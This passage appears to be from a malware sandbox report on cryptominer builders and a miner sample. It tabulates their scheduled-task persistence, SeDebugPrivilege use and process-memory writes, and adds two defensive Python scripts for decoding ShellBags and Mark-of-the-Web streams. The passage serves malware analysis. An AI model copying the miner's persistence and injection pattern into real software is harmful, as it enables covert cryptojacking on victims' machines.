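The BagMRU and Bags\…\ComDlg values above are ShellBag entries: the builder opened a common file dialog, and Explorer's dialog code recorded every folder it browsed as a shell item blob under the user's Classes hive, so these rows encode the path the operator walked during detonation. The script below is an added example (not part of the sandbox report or of the sample) that decodes the three shell item types present in these rows (root folder 0x1f, volume 0x2f, file entry 0x31 with its 0xBEEF0004 extension block) and rebuilds the browsed path from the depth of each BagMRU value. It embeds the rows exactly as logged above; the level between Admin and Local is not among the rows in this excerpt, so the reconstruction marks it rather than guessing. The CLSID name and the extension-block field layout come from the public ShellBag format documentation (libfwsi), not from the report, and the function names are this example's own.

```python
import re
import struct
import uuid

# Rows copied from the registry table above. The logged path ends in the value
# name (a child index under BagMRU); each value holds exactly one shell item.
PREFIX = (r"\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes"
          r"\Local Settings\Software\Microsoft\Windows\Shell\BagMRU")
BAGMRU_ROWS = [
    (PREFIX + r"\0", "14001f50e04fd020ea3a6910a2d808002b30309d0000"),
    (PREFIX + r"\0\0", "19002f433a5c000000000000000000000000000000000000000000"),
    (PREFIX + r"\0\0\0", "78003100000000006d5a76841100557365727300640009000400efbec5522d606f5a4da72e0000006c0500000000010000000000000000003a00000000003e5e3d0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000"),
    (PREFIX + r"\0\0\0\0", "50003100000000006d5a028b100041646d696e003c0009000400efbe6d5a76846f5a4da72e00000021570200000001000000000000000000000000000000c9a0bf00410064006d0069006e00000014000000"),
    (PREFIX + r"\0\0\0\0\0\0", "50003100000000006d5aa38610004c6f63616c003c0009000400efbe6d5a76846f5a4da72e00000040570200000001000000000000000000000000000000727b8d004c006f00630061006c00000014000000"),
    (PREFIX + r"\0\0\0\0\0\0\0", "4e003100000000006f5a4fa7100054656d7000003a0009000400efbe6d5a76846f5a4fa72e00000041570200000001000000000000000000000000000000493c2f01540065006d007000000014000000"),
    (PREFIX + r"\0\0\0\0\0\0\0\0", "60003100000000006f5a4fa71000375a4f3435347e320000480009000400efbe6f5a4fa76f5a4fa72e00000040b2020000001a000000000000000000000000000000493c2f0137007a004f0034003500340043003400390039003800000018000000"),
]

# Shell namespace root CLSIDs we care about here (My Computer / This PC).
KNOWN_CLSIDS = {"20d04fe0-3aea-1069-a2d8-08002b30309d": "My Computer"}


def _utf16z(buf, off):
    """Read a NUL-terminated UTF-16LE string starting at `off`."""
    end = off
    while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16-le")


def parse_shell_item(data):
    """Decode one shell item (the payload of a BagMRU value) into a kind and display name."""
    size, kind = struct.unpack_from("<HB", data, 0)
    item = data[:size]
    if kind == 0x1F:                                   # root folder: sort byte + CLSID
        clsid = str(uuid.UUID(bytes_le=item[4:20]))
        return {"kind": "root", "name": KNOWN_CLSIDS.get(clsid, "{%s}" % clsid)}
    if kind == 0x2F:                                   # volume: ASCII label after the type byte
        return {"kind": "volume", "name": item[3:].split(b"\x00", 1)[0].decode("ascii")}
    if (kind & 0x70) == 0x30:                          # file entry: 0x31 directory, 0x32 file
        short_end = item.index(b"\x00", 14)            # ANSI/8.3 name starts at offset 14
        short = item[14:short_end].decode("ascii", "replace")
        pos = short_end + 1
        pos += pos % 2                                 # extension block is 2-byte aligned
        name = short
        if pos + 8 <= size:
            _ext_size, ver, sig = struct.unpack_from("<HHI", item, pos)
            if sig == 0xBEEF0004 and ver >= 3:         # long-name extension block
                off = 18                               # header(8) + created(4) + accessed(4) + id(2)
                if ver >= 7:
                    off += 2 + 8 + 8                   # unknown, NTFS file reference, unknown
                off += 2                               # localized-name length
                if ver >= 9:
                    off += 4
                if ver >= 8:
                    off += 4
                name = _utf16z(item, pos + off)
        return {"kind": "dir" if (kind & 1) else "file", "name": name, "short": short}
    return {"kind": "unknown", "name": "<type 0x%02x>" % kind}


def reconstruct_paths(rows):
    """Walk BagMRU value paths (one shell item per level) back into filesystem paths."""
    nodes = {}
    for reg_path, hexdata in rows:
        m = re.search(r"\\BagMRU((?:\\\d+)+)$", reg_path)
        if m:
            key = tuple(int(i) for i in m.group(1).split("\\")[1:])
            nodes[key] = parse_shell_item(bytes.fromhex(hexdata))
    leaves = [k for k in nodes if not any(len(o) > len(k) and o[:len(k)] == k for o in nodes)]
    paths = []
    for leaf in sorted(leaves):
        parts = []
        for depth in range(1, len(leaf) + 1):
            node = nodes.get(leaf[:depth])
            if node is None:
                parts.append("<missing>")              # level not present in the rows given
            elif node["kind"] != "root":               # namespace root is not a path element
                parts.append(node["name"].rstrip("\\"))
        paths.append("\\".join(parts))
    return paths


if __name__ == "__main__":
    for path in reconstruct_paths(BAGMRU_ROWS):
        print(path)
```

The same decoder applies to the Bags\…\ComDlg keys and to ShellBags under NTUSER.DAT and UsrClass.dat on a live host; the useful signal here is that the dialog was driven into 7-Zip's 7zO454C4998 temp extraction folder, matching the process paths later in the report. Parsing BagMRU\0\1 or other sibling branches needs only more rows, since the walk keys on the full index tuple rather than assuming every level is index 0.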

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer (2).exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer (1).exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
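The three rows above are Edge and Chrome writing the Zone.Identifier alternate data stream onto their own downloads, which is how a browser applies the Mark-of-the-Web; by itself that is expected behaviour, and the "Mark-of-the-Web Bypass" signature in the summary is about the mark being absent or removed before the file runs. The script below is an added example, not taken from the report, that reads and parses that stream so an analyst can check whether a downloaded executable still carries its mark and which zone and host it records. The sample stream text and its placeholder host name are constructed, modelled on what Chromium-based browsers write; the function names and the Downloads folder scan are this example's own.

```python
import os

# Constructed sample of a Zone.Identifier stream as a Chromium-based browser writes it
# (placeholder host; not taken from the report).
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://downloads.example.invalid/\r\n"
    "HostUrl=https://downloads.example.invalid/TaskManager%20Installer.exe\r\n"
)

# URL security zone identifiers used in the ZoneId field.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}


def parse_zone_identifier(text):
    """Parse the INI-style body of a Zone.Identifier stream into zone id, zone name and URLs."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    zone = int(fields["ZoneId"]) if fields.get("ZoneId", "").isdigit() else None
    return {"zone_id": zone, "zone_name": ZONE_NAMES.get(zone, "Unknown"),
            "referrer": fields.get("ReferrerUrl"), "host": fields.get("HostUrl")}


def read_zone_identifier(path):
    """Return the file's Zone.Identifier stream text, or None if there is no such stream."""
    try:
        # NTFS exposes alternate data streams through the "file:stream" name syntax.
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return None


def assess(stream_text):
    """One-line verdict on a file's Mark-of-the-Web state."""
    if stream_text is None:
        return "no Mark-of-the-Web: never tagged, stripped, or copied via a non-NTFS path"
    info = parse_zone_identifier(stream_text)
    if info["zone_id"] is None:
        return "Zone.Identifier present but carries no ZoneId (malformed)"
    verdict = f"{info['zone_name']} zone (ZoneId={info['zone_id']})"
    if info["host"]:
        verdict += f", downloaded from {info['host']}"
    return verdict


def scan_downloads(folder):
    """Map every .exe directly under `folder` to its Mark-of-the-Web assessment."""
    results = {}
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        if os.path.isfile(path) and name.lower().endswith(".exe"):
            results[path] = assess(read_zone_identifier(path))
    return results


if __name__ == "__main__":
    for path, verdict in scan_downloads(os.path.join(os.path.expanduser("~"), "Downloads")).items():
        print(path, "->", verdict)
```

Opening "file:Zone.Identifier" only works on NTFS under Windows; elsewhere the open fails and the file reports as untagged, which is the same answer a stripped stream gives, so read "no Mark-of-the-Web" together with where the file came from. Files that 7-Zip extracts into its 7zO… temp directory carry no Zone.Identifier unless 7-Zip's option to propagate the Zone.Id stream is enabled (it is off by default), which is worth keeping in mind when a detonation launches executables straight out of 7zFM's temp folder as this one does.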

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 (privilege value 35 = SeCreateSymbolicLinkPrivilege; not resolved to a name by the sandbox) N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5204 wrote to memory of 1040 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe
PID 5204 wrote to memory of 1040 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe
PID 5204 wrote to memory of 4304 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe
PID 5204 wrote to memory of 4304 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe
PID 4304 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4304 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2588 wrote to memory of 5516 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2588 wrote to memory of 5516 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4304 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 4304 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 4472 wrote to memory of 3324 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 4472 wrote to memory of 3324 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 4472 wrote to memory of 3324 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 3324 wrote to memory of 5544 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
